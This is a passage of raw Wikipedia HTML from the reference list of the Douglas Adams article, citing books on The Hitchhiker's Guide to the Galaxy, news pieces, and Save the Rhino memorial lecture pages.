<a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-330-41957-9\" title=\"Special:BookSources/0-330-41957-9\">0-330-41957-9</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas&rft.btitle=The+Hitchhiker%27s+Guide+to+the+Galaxy%3A+The+Original+Radio+Scripts&rft.date=2003&rft.edition=25th+Anniversary&rft.genre=book&rft.isbn=0-330-41957-9&rft.pages=10&rft.pub=Pan+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-16\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-16\">^</a></b></span> <span class=\"reference-text\">Webb 2005a, p. 120.</span></li>\n<li id=\"cite_note-17\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-17\">^</a></b></span> <span class=\"reference-text\">Felch 2004</span></li>\n<li id=\"cite_note-Simpson_236-18\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_236_18-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, p. 
236</span></li>\n<li id=\"cite_note-19\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-19\">^</a></b></span> <span class=\"reference-text\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.iblist.com/series.php?id=2\">Internet Book List</a> page, with links to all five novels, and reproductions of the 1990s paperback covers that included the <a href=\"/wiki/42_Puzzle\" class=\"mw-redirect\" title=\"42 Puzzle\">42 Puzzle</a>.</span></li>\n<li id=\"cite_note-20\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-20\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.imdb.com/title/tt0081874/\">The Hitch Hiker's Guide to the Galaxy</a>, Internet Movie Database</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=The+Hitch+Hiker%27s+Guide+to+the+Galaxy&rft.genre=book&rft_id=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0081874%2F&rft.pub=Internet+Movie+Database&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-21\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-21\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas (2005). <a href=\"/wiki/Dirk_Maggs\" title=\"Dirk Maggs\">Dirk Maggs</a>, dramatisations and editor, ed. <i>The Hitchhiker's Guide to the Galaxy Radio Scripts: The Tertiary, Quandary and Quintessential Phases</i>. Pan Books. p. xiv. 
<a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-330-43510-8\" title=\"Special:BookSources/0-330-43510-8\">0-330-43510-8</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas.&rft.btitle=The+Hitchhiker%27s+Guide+to+the+Galaxy+Radio+Scripts%3A+The+Tertiary%2C+Quandary+and+Quintessential+Phases&rft.date=2005&rft.genre=book&rft.isbn=0-330-43510-8&rft.pages=xiv&rft.pub=Pan+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-22\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-22\">^</a></b></span> <span class=\"reference-text\">Adams, <i>Dirk Maggs</i>, p. 356.</span></li>\n<li id=\"cite_note-23\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-23\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\"><a href=\"/wiki/Neil_Gaiman\" title=\"Neil Gaiman\">Gaiman, Neil</a> (2003). <i>Don't Panic: Douglas Adams & The Hitchhiker's Guide to the Galaxy</i> (Second U.S. ed.). Titan Books. p. 169. 
<a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/1-84023-742-2\" title=\"Special:BookSources/1-84023-742-2\">1-84023-742-2</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Gaiman%2C+Neil&rft.btitle=Don%27t+Panic%3A+Douglas+Adams+%26+The+Hitchhiker%27s+Guide+to+the+Galaxy&rft.date=2003&rft.edition=Second+U.S.&rft.genre=book&rft.isbn=1-84023-742-2&rft.pages=169&rft.pub=Titan+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-24\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-24\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.skepticfiles.org/en001/drwhogde.htm\">\"A 1990s Doctor Who FAQ\"</a>. Skepticfiles.org<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=A+1990s+Doctor+Who+FAQ&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.skepticfiles.org%2Fen001%2Fdrwhogde.htm&rft.pub=Skepticfiles.org&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-25\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-25\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Moffat, Steven (24 December 2012). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.radiotimes.com/news/2012-12-24/doctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all\">\"Doctor Who Christmas special: Steven Moffat, Matt Smith and Jenna-Louise Coleman reveal all\"</a>. <i>Radio Times</i><span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">8 July</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Doctor+Who+Christmas+special%3A+Steven+Moffat%2C+Matt+Smith+and+Jenna-Louise+Coleman+reveal+all&rft.aufirst=Steven&rft.aulast=Moffat&rft.date=2012-12-24&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.radiotimes.com%2Fnews%2F2012-12-24%2Fdoctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all&rft.jtitle=Radio+Times&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Adams_xx-26\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Adams_xx_26-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, p. xx</span></li>\n<li id=\"cite_note-27\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-27\">^</a></b></span> <span class=\"reference-text\">Webb, p. 49.</span></li>\n<li id=\"cite_note-Mabbett-MM-28\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-Mabbett-MM_28-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-Mabbett-MM_28-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\"><cite class=\"citation book\">Mabbett, Andy (2010). <i>Pink Floyd – The Music and the Mystery</i>. London: Omnibus Press. 
<a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/978-1-84938-370-7\" title=\"Special:BookSources/978-1-84938-370-7\">978-1-84938-370-7</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Andy&rft.aulast=Mabbett&rft.btitle=Pink+Floyd+%93+The+Music+and+the+Mystery&rft.date=2010&rft.genre=book&rft.isbn=978-1-84938-370-7&rft.place=London&rft.pub=Omnibus+Press&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-29\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-29\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Adams, Douglas (8 February 1996). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.procolharum.com/dadams.htm\">\"Text of one of Douglas Adams's introductions of Procol Harum in concert\"</a><span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">21 August</span> 2006</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Douglas&rft.aulast=Adams&rft.btitle=Text+of+one+of+Douglas+Adams%27s+introductions+of+Procol+Harum+in+concert&rft.date=1996-02-08&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.procolharum.com%2Fdadams.htm&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-bbc.co.uk-30\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-bbc.co.uk_30-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-bbc.co.uk_30-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\">BBC Online (no date) <a rel=\"nofollow\" class=\"external text\" href=\"http://www.bbc.co.uk/cult/hitchhikers/dna/biog.shtml\">\"The Hitchhiker's Guide to the Galaxy: DNA (1952-2001)\"</a> Accessed 9 July 2014</span></li>\n<li id=\"cite_note-31\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-31\">^</a></b></span> <span class=\"reference-text\">Botti, Nicolas (2009). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.douglasadams.eu/en_adams_bio.php\">\"Life, DNA & h2g2: Douglas Adams's Biography\"</a> Accessed 9 July 2014</span></li>\n<li id=\"cite_note-32\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-32\">^</a></b></span> <span class=\"reference-text\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.imdb.com/title/tt0188677/\">Internet Movie Database's page for <i>Hyperland</i></a></span></li>\n<li id=\"cite_note-33\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-33\">^</a></b></span> <span class=\"reference-text\">Adams 1998.</span></li>\n<li id=\"cite_note-amath-34\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-amath_34-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation journal\">Silverman, Dave (1998–1999). 
<a rel=\"nofollow\" class=\"external text\" href=\"http://www.atheists.org/Interview%3A__Douglas_Adams\">\"Interview: Douglas Adams\"</a>. <i>American Atheist</i>. <b>37</b> (1). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mRFcWVO?url=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">16 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Interview%3A+Douglas+Adams&rft.aufirst=Dave&rft.aulast=Silverman&rft.date=1998%2F1999&rft.genre=article&rft_id=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams&rft.issue=1&rft.jtitle=American+Atheist&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&rft.volume=37\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-TheGuardian-35\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-TheGuardian_35-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">Bunce, Kim (5 November 2006). <a rel=\"nofollow\" class=\"external text\" href=\"http://books.guardian.co.uk/reviews/roundupstory/0,,1939704,00.html\">\"Observer, ''The God Delusion'', 5 November 2006\"</a>. <i><a href=\"/wiki/The_Guardian\" title=\"The Guardian\">The Guardian</a></i>. London<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">1 June</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Observer%2C+%27%26%2339%3BThe+God+Delusion%27%26%2339%3B%2C+5+November+2006&rft.aufirst=Kim&rft.aulast=Bunce&rft.date=2006-11-05&rft.genre=article&rft_id=http%3A%2F%2Fbooks.guardian.co.uk%2Freviews%2Froundupstory%2F0%2C%2C1939704%2C00.html&rft.jtitle=The+Guardian&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Dawkins2001-36\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Dawkins2001_36-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">Dawkins, Richard (13 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.guardian.co.uk/uk/2001/may/14/books.booksnews\">\"Lament for Douglas Adams\"</a>. <i>The Guardian</i><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">29 December</span> 2012</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Lament+for+Douglas+Adams&rft.aufirst=Richard&rft.aulast=Dawkins&rft.date=2001-05-13&rft.genre=article&rft_id=http%3A%2F%2Fwww.guardian.co.uk%2Fuk%2F2001%2Fmay%2F14%2Fbooks.booksnews&rft.jtitle=The+Guardian&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-37\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-37\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\"><a href=\"/wiki/Paola_Cavalieri\" title=\"Paola Cavalieri\">Cavalieri, Paola</a> and <a href=\"/wiki/Peter_Singer\" title=\"Peter Singer\">Peter Singer</a>, editors (1994). <i>The Great Ape Project: Equality Beyond Humanity</i> (U.S. Paperback ed.). St. Martin's Griffin. pp. 19–23. 
<a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-312-11818-X\" title=\"Special:BookSources/0-312-11818-X\">0-312-11818-X</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Cavalieri%2C+Paola+and+Peter+Singer%2C+editors&rft.btitle=The+Great+Ape+Project%3A+Equality+Beyond+Humanity&rft.date=1994&rft.edition=U.S.+Paperback&rft.genre=book&rft.isbn=0-312-11818-X&rft.pages=19-23&rft.pub=St.+Martin%27s+Griffin&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span> <span class=\"citation-comment\" style=\"display:none; color:#33aa33\">CS1 maint: Multiple names: authors list (<a href=\"/wiki/Category:CS1_maint:_Multiple_names:_authors_list\" title=\"Category:CS1 maint: Multiple names: authors list\">link</a>)</span></span></li>\n<li id=\"cite_note-38\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-38\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://lifednah2g2.blogspot.co.uk/2011/01/ninth-douglas-adams-memorial-lecture.html\">\"The Ninth Douglas Adams Memorial Lecture\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">27 July</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=The+Ninth+Douglas+Adams+Memorial+Lecture&rft.genre=unknown&rft_id=http%3A%2F%2Flifednah2g2.blogspot.co.uk%2F2011%2F01%2Fninth-douglas-adams-memorial-lecture.html&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-39\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-39\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/latest_news/news/287_douglas_adams_the_party\">\"Douglas Adams The Party\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+The+Party&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Flatest_news%2Fnews%2F287_douglas_adams_the_party&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-40\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-40\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/events/476_douglas_adams_memorial_lecture_2013\">\"Douglas Adams Memorial Lecture 2013\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">15 August</span> 2012</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2013&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Fevents%2F476_douglas_adams_memorial_lecture_2013&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-41\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-41\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/events/798_douglas_adams_memorial_lecture\">\"Douglas Adams Memorial Lecture 2014\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">15 November</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2014&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Fevents%2F798_douglas_adams_memorial_lecture&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-42\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-42\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.savetherhino.org/events/1059_douglas_adams_memorial_lecture_2015_-_sold_out\">\"Douglas Adams Memorial Lecture 2015\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">30 January</span> 2015</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2015&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.savetherhino.org%2Fevents%2F1059_douglas_adams_memorial_lecture_2015_-_sold_out&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-43\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-43\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://www.savetherhino.org/events/1383_douglas_adams_memorial_lecture_2016\">\"Douglas Adams Memorial Lecture 2016\"</a>. Save the Rhino International<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">7 December</span> 2015</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams+Memorial+Lecture+2016&rft.genre=unknown&rft_id=https%3A%2F%2Fwww.savetherhino.org%2Fevents%2F1383_douglas_adams_memorial_lecture_2016&rft.pub=Save+the+Rhino+International&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Simpson_184-185-44\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-Simpson_184-185_44-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-Simpson_184-185_44-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 184–185</span></li>\n<li id=\"cite_note-45\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-45\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas and <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> (1991). 
<i>Last Chance to See</i> (First U.S. Hardcover ed.). <a href=\"/wiki/Harmony_Books\" title=\"Harmony Books\">Harmony Books</a>. p. 59. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-517-58215-5\" title=\"Special:BookSources/0-517-58215-5\">0-517-58215-5</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas+and+Mark+Carwardine&rft.btitle=Last+Chance+to+See&rft.date=1991&rft.edition=First+U.S.+Hardcover&rft.genre=book&rft.isbn=0-517-58215-5&rft.pages=59&rft.pub=Harmony+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-46\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-46\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas (2002). <i>The Salmon of Doubt: Hitchhiking the Galaxy One Last Time</i> (First UK hardcover ed.). Macmillan. pp. 90–1. 
<a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-333-76657-1\" title=\"Special:BookSources/0-333-76657-1\">0-333-76657-1</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas&rft.btitle=The+Salmon+of+Doubt%3A+Hitchhiking+the+Galaxy+One+Last+Time&rft.date=2002&rft.edition=First+UK+hardcover&rft.genre=book&rft.isbn=0-333-76657-1&rft.pages=90-1&rft.pub=Macmillan&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-47\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-47\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=gx6WPQkhUXI\">\"Craig Ferguson 23 February, 2010B Late Late show Stephen Fry PT2\"</a>. YouTube. 21 June 2010<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">27 July</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Craig+Ferguson+23+February%2C+2010B+Late+Late+show+Stephen+Fry+PT2&rft.date=2010-06-21&rft.genre=unknown&rft_id=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dgx6WPQkhUXI&rft.pub=YouTube&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-48\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-48\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.douglasadams.com/cgi-bin/mboard/info/dnathread.cgi?2922,1\">\"Adams's final post on his forums at\"</a>. Douglasadams.com<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">1 June</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Adams%27s+final+post+on+his+forums+at&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.douglasadams.com%2Fcgi-bin%2Fmboard%2Finfo%2Fdnathread.cgi%3F2922%2C1&rft.pub=Douglasadams.com&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-49\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-49\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://groups.google.com/group/alt.fan.douglas-adams\">\"Discussions – alt.fan.douglas-adams | Google Groups\"</a>. Google<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Discussions+%93+alt.fan.douglas-adams+%26%23124%3B+Google+Groups&rft.genre=unknown&rft_id=https%3A%2F%2Fgroups.google.com%2Fgroup%2Falt.fan.douglas-adams&rft.pub=Google&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-50\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-50\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Adams, Douglas (15 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://channel9.msdn.com/Events/PDC/PDC-1996/PDC-1996-Keynote-with-Douglas-Adams\">\"PDC 1996 Keynote with Douglas Adams\"</a>. <i><a href=\"/w/index.php?title=Channel9.msdn.com&action=edit&redlink=1\" class=\"new\" title=\"Channel9.msdn.com (page does not exist)\">channel9.msdn.com</a></i>. Channel 9<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">22 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=PDC+1996+Keynote+with+Douglas+Adams&rft.aufirst=Douglas&rft.aulast=Adams&rft.date=2001-05-15&rft.genre=unknown&rft_id=http%3A%2F%2Fchannel9.msdn.com%2FEvents%2FPDC%2FPDC-1996%2FPDC-1996-Keynote-with-Douglas-Adams&rft.jtitle=channel9.msdn.com&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-51\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-51\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Cassel, David (15 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://archive.salon.com/tech/feature/2001/05/15/douglas_adams/index.html\">\"So long, Douglas Adams, and thanks for all the fun\"</a>. <i><a href=\"/wiki/Salon_(website)\" title=\"Salon (website)\">Salon</a></i>. Salon Media Group<span class=\"reference-accessdate\">. 
